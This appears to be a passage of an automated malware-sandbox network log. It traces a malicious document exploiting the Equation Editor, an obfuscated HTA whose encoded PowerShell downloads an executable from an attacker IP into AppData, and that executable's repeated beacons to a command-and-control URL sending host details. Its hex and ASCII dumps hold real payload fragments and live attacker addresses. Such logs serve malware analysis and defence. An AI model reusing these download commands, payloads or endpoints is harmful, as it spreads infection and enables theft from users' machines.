                                                Data Ascii: *_+;<40(7]<';-^<$-?8?=?~%**[0]'38@|%?[%?`0(-%])^0]6`9?)?%7'!*01[5,21(^%?8?0,2??,~51+<.)_0)1,[[>1?2]]/%?|.?__9`?28?7=??28)9-),2?#7$@&%7?.7?[|``?3>-%+,6[?9??2|??#&,^3~7(~!'?)_[;2@#./!%|>*?(?)%~?$&*6]_|?!~^;:49;?*_7:.?)~]?^;5^5,^,[&<
                                                Nov 20, 2024 10:11:13.454540968 CET1236INData Raw: 61 74 61 39 30 35 35 33 30 7b 5c 2a 5c 61 75 6c 77 39 30 33 36 30 32 31 37 38 20 5c 62 69 6e 30 30 30 5c 31 35 36 33 36 38 34 38 39 34 30 36 33 37 34 33 39 30 7d 0d 7b 5c 2a 5c 75 70 72 33 30 37 35 33 37 39 36 38 20 5c 62 69 6e 30 30 30 30 5c 39
                                                Data Ascii: ata905530{\*\aulw903602178 \bin000\156368489406374390}{\*\upr307537968 \bin0000\979391212265309150}\paperh680587349947323\themelang9778670749\'
                                                Nov 20, 2024 10:11:13.454551935 CET224INData Raw: 20 20 09 20 09 09 09 20 09 09 09 20 09 09 09 20 09 09 09 20 20 20 09 20 20 09 20 09 20 20 09 20 09 20 09 09 20 20 20 20 20 20 09 09 20 20 09 20 20 20 20 09 09 09 09 09 20 20 09 09 20 09 09 09 09 20 20 20 09 20 64 35 20 20 09 20 20 09 20 09 09 09
                                                Data Ascii: d5 8
                                                Nov 20, 2024 10:11:13.454710960 CET1236INData Raw: 09 09 09 09 09 09 20 20 20 09 20 36 09 20 09 09 09 20 09 09 09 20 20 20 20 20 20 20 20 09 20 20 20 20 09 09 09 09 09 20 09 20 09 20 09 09 20 20 09 09 09 09 09 20 20 20 20 09 20 09 09 20 20 20 20 20 20 20 09 09 09 09 20 09 09 09 09 09 09 09 20 09
                                                Data Ascii: 6 e 6
                                                Nov 20, 2024 10:11:13.454721928 CET1236INData Raw: 20 20 20 09 09 20 20 09 09 20 20 20 09 20 20 09 20 09 20 20 20 20 09 20 30 0a 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0d 0d 0a 30 30 20 20 20 09 09 09 09 20 09 09 20 09 09 20 09 20 09 09 09
                                                Data Ascii: 000 001
                                                Nov 20, 2024 10:11:13.460696936 CET1236INData Raw: 09 20 09 09 09 09 09 20 20 09 09 09 20 09 09 20 20 09 20 09 20 20 20 09 20 20 20 20 20 09 09 20 09 20 09 20 09 09 20 20 09 09 20 09 20 20 20 09 09 09 20 09 09 09 09 09 20 09 20 09 20 09 09 09 20 20 20 09 09 20 20 09 20 30 30 09 20 09 20 20 20 09
                                                Data Ascii: 00 00000000
                                                Nov 20, 2024 10:11:15.016913891 CET282OUTHEAD /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1
                                                User-Agent: Microsoft Office Existence Discovery
                                                Host: 66.63.187.231
                                                Content-Length: 0
                                                Connection: Keep-Alive
                                                Nov 20, 2024 10:11:15.250508070 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 20 Nov 2024 09:11:15 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                Last-Modified: Wed, 20 Nov 2024 01:43:14 GMT
                                                ETag: "3ecb0-6274e45e8a3e9"
                                                Accept-Ranges: bytes
                                                Content-Length: 257200
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: application/msword


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.224916966.63.187.231803752C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:16.208429098 CET363OUTGET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 66.63.187.231
                                                Connection: Keep-Alive
                                                Nov 20, 2024 10:11:16.946014881 CET1236INHTTP/1.1 200 OK
                                                Date: Wed, 20 Nov 2024 09:11:16 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                Last-Modified: Wed, 20 Nov 2024 01:52:14 GMT
                                                ETag: "5c04-6274e6620b225"
                                                Accept-Ranges: bytes
                                                Content-Length: 23556
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/hta
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 63 52 69 70 54 20 4c 41 4e 47 75 61 67 45 3d 22 76 42 73 63 52 49 70 54 22 3e 0d 0a 44 49 6d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><ScRipT LANGuagE="vBscRIpT">DImtzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK
                                                Nov 20, 2024 10:11:16.946032047 CET224INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii: ,
                                                Nov 20, 2024 10:11:16.946044922 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii: suiePMvPIuVcNMhTeJ
                                                Nov 20, 2024 10:11:16.946078062 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii: tzHLdKvsEcRW
                                                Nov 20, 2024 10:11:16.946090937 CET448INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii:
                                                Nov 20, 2024 10:11:16.946259975 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii: ChrW(&H77)
                                                Nov 20, 2024 10:11:16.946274042 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii:
                                                Nov 20, 2024 10:11:16.946477890 CET448INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii:
                                                Nov 20, 2024 10:11:16.946549892 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 31 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 43 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 65 56
                                                Data Ascii: 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x
                                                Nov 20, 2024 10:11:16.946562052 CET1236INData Raw: 67 49 43 41 67 49 43 42 4d 57 56 42 6f 63 47 5a 61 56 6d 67 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 74 55 47 46 7a 63 31 52 6f 63 6e 55 37 49 43 41 67 49
                                                Data Ascii: gICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLD
                                                Nov 20, 2024 10:11:16.951093912 CET1236INData Raw: 46 71 43 5a 4e 4c 5a 61 52 76 78 6b 52 55 52 50 56 6f 65 69 52 51 4a 51 4e 49 47 53 6c 4a 43 7a 79 4e 64 52 56 6e 41 64 54 47 4b 2e 72 55 6e 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                Data Ascii: FqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK.rUn


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.224917066.63.187.231803876C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:24.287302971 CET313OUTGET /33/caspol.exe HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 66.63.187.231
                                                Connection: Keep-Alive
                                                Nov 20, 2024 10:11:25.038772106 CET1236INHTTP/1.1 200 OK
                                                Date: Wed, 20 Nov 2024 09:11:24 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                Last-Modified: Wed, 20 Nov 2024 01:27:09 GMT
                                                ETag: "92a00-6274e0c657f44"
                                                Accept-Ranges: bytes
                                                Content-Length: 600576
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/x-msdownload
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:=g0 & @@ `&O@|` H.text `.rsrc|@@@.reloc`(@B&H6(^(}{rp o5{o7&*0{o9}&*0to{{rp(o:+%{oo;o&Xi2{o<&{o=*+E\b2{oA*n(}}(*0
                                                Nov 20, 2024 10:11:25.038808107 CET224INData Raw: 00 be 00 00 00 03 00 00 11 02 7b 07 00 00 04 6f 1a 00 00 0a 17 8d 33 00 00 01 25 16 1f 3b 9d 6f 1b 00 00 0a 0a 02 7b 09 00 00 04 6f 1a 00 00 0a 0b 73 1c 00 00 0a 0c 02 7b 03 00 00 04 06 07 08 6f 03 00 00 06 2c 69 72 35 00 00 70 0d 08 6f 1d 00 00
                                                Data Ascii: {o3%;o{os{o,ir5po+(r5p(( -o!r9p(("&{o#{o#+rap("&&(*L$p.
                                                Nov 20, 2024 10:11:25.038819075 CET1236INData Raw: 09 19 00 00 01 1b 30 01 00 23 00 00 00 00 00 00 00 02 7b 03 00 00 04 6f 04 00 00 06 de 15 26 de 12 02 7b 04 00 00 04 6f 24 00 00 0a 02 28 25 00 00 0a dc 2a 00 01 1c 00 00 00 00 00 00 0d 0d 00 03 19 00 00 01 02 00 00 00 10 10 00 12 00 00 00 00 13
                                                Data Ascii: 0#{o&{o$(%*0H{orpo&,${orpo&,{o'*{o'*0{o&*vrp("&{o$(%*
                                                Nov 20, 2024 10:11:25.038830996 CET1236INData Raw: 0a 02 28 42 00 00 0a 02 7b 08 00 00 04 6f 43 00 00 0a 02 28 42 00 00 0a 02 7b 07 00 00 04 6f 43 00 00 0a 02 28 42 00 00 0a 02 7b 06 00 00 04 6f 43 00 00 0a 02 06 72 e3 01 00 70 6f 44 00 00 0a 74 43 00 00 01 28 45 00 00 0a 02 1e 1d 1e 1d 73 32 00
                                                Data Ascii: (B{oC(B{oC(B{oCrpoDtC(Es2(Frp(4rpo8sG(H(I(J*rp}r#p}((*0s#s}{ooK>{oo
                                                Nov 20, 2024 10:11:25.038844109 CET1236INData Raw: 06 95 58 20 ff 00 00 00 5f 13 0b 11 0b 1f 7b 61 20 ff 00 00 00 5f 20 c8 01 00 00 58 20 00 01 00 00 5e 25 11 0b 61 1f 0f 5f 13 0c 11 0c 19 33 07 11 0c 11 09 61 13 0c 26 09 11 08 07 11 08 91 11 04 11 0b 95 61 d2 9c 11 0c 11 0a 5a 11 08 58 20 00 01
                                                Data Ascii: X _{a _ X ^%a_3a&aZX ]aXi?.J()rpoDu1 %(RuJoSoT()oUrp%N%1%{%{%
                                                Nov 20, 2024 10:11:25.038856983 CET1236INData Raw: 18 00 00 04 2a 1b 30 06 00 d4 00 00 00 0a 00 00 11 02 7b 1d 00 00 04 2c 10 02 7b 19 00 00 04 6f 67 00 00 0a 3a bb 00 00 00 02 05 7d 1e 00 00 04 02 73 68 00 00 0a 7d 19 00 00 04 02 7b 19 00 00 04 03 04 6f 69 00 00 0a 02 02 7b 19 00 00 04 6f 6a 00
                                                Data Ascii: *0{,{og:}sh}{oi{oj},+{sk}{ol{}+{}}(41%rp(1-}{omsBz}&}**
                                                Nov 20, 2024 10:11:25.038949013 CET1236INData Raw: 00 0e 00 00 11 02 7b 1d 00 00 04 2c 46 03 72 d9 05 00 70 6f 7b 00 00 0a 2d 0d 03 72 d9 05 00 70 28 16 00 00 0a 10 01 28 7c 00 00 0a 03 6f 51 00 00 0a 0a 02 7b 1a 00 00 04 06 16 06 8e 69 6f 7d 00 00 0a 02 7b 1a 00 00 04 6f 7e 00 00 0a de 0e 26 fe
                                                Data Ascii: {,Frpo{-rp((|oQ{io}{o~&rpsBz*.K0L{,7s I{io&o&o&rYpsBz*#<"(*&(*BSJB
                                                Nov 20, 2024 10:11:25.039562941 CET1236INData Raw: 02 63 02 01 00 6f 01 63 02 01 00 25 08 67 02 01 00 08 00 6b 02 11 00 4e 07 6f 02 11 00 76 02 74 02 11 00 8f 01 79 02 01 00 c5 0c 7d 02 01 00 13 07 82 02 01 00 e5 06 87 02 01 00 fe 06 8c 02 01 00 46 01 91 02 01 00 4e 00 91 02 50 20 00 00 00 00 86
                                                Data Ascii: coc%gkNovty}FNP \!*i!!:p"^"#!@#^##
                                                Nov 20, 2024 10:11:25.039577007 CET776INData Raw: 00 01 00 43 08 00 00 01 00 85 00 00 00 01 00 78 09 10 10 01 00 d9 0c 00 00 01 00 cb 02 00 00 02 00 b0 0b 00 00 01 00 b0 0b 00 00 01 00 60 01 00 00 01 00 da 0b 00 00 02 00 10 0d 10 10 03 00 4f 00 00 00 01 00 3e 02 00 00 02 00 78 01 00 00 01 00 38
                                                Data Ascii: Cx`O>x8Cxr$)19AIQYaiqyA
                                                Nov 20, 2024 10:11:25.039587975 CET1236INData Raw: 00 51 01 d4 02 06 00 b1 02 19 02 ca 01 41 02 44 00 3d 01 b9 02 a3 05 d3 01 89 01 0d 0c d9 01 71 01 b7 09 06 00 89 01 a6 0b e9 01 71 01 68 01 ee 01 81 00 b2 05 3f 00 c1 02 b7 09 10 00 c1 02 02 06 00 02 c9 02 ce 0b 7d 00 d1 02 fc 04 3f 00 89 01 46
                                                Data Ascii: QAD=qqh?}?FA=YYY#A+1JJ)^.6.?.^.#g.+w.3w.;w.Cg.K}.Sw.[w.c.
                                                Nov 20, 2024 10:11:25.045048952 CET1236INData Raw: 72 63 65 43 75 6c 74 75 72 65 00 43 61 70 74 75 72 65 00 42 75 74 74 6f 6e 42 61 73 65 00 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 74 74 69 6e 67 73 42 61 73 65 00 54 65 78 74 42 6f 78 42 61 73 65 00 43 68 65 63 6b 52 65 73 70 6f 6e 73 65 00 72 65
                                                Data Ascii: rceCultureCaptureButtonBaseApplicationSettingsBaseTextBoxBaseCheckResponseresponseCloseDisposeAuthenticateEditorBrowsableStateProcessStateWriteSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebu


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.224917194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:34.224472046 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 176
                                                Connection: close
                                                Nov 20, 2024 10:11:34.232361078 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: 'ckav.ruAlbus367706ALBUS-PCk0DE4229FCF97F5879F50F8FD3cEKF9
                                                Nov 20, 2024 10:11:34.825088978 CET185INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:34 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.224917294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:34.927901030 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 176
                                                Connection: close
                                                Nov 20, 2024 10:11:34.936985970 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: 'ckav.ruAlbus367706ALBUS-PC+0DE4229FCF97F5879F50F8FD3dF5bH
                                                Nov 20, 2024 10:11:35.688764095 CET185INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:35 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.224917394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:35.748172045 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:35.753276110 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:36.639029026 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:36 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.224917494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:36.782336950 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:36.788419962 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:37.678376913 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:37 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.224917594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:37.858225107 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:37.865230083 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:38.715972900 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:38 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.224917694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:39.929833889 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:39.935431004 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:40.657332897 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:40 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.224917794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:40.798015118 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
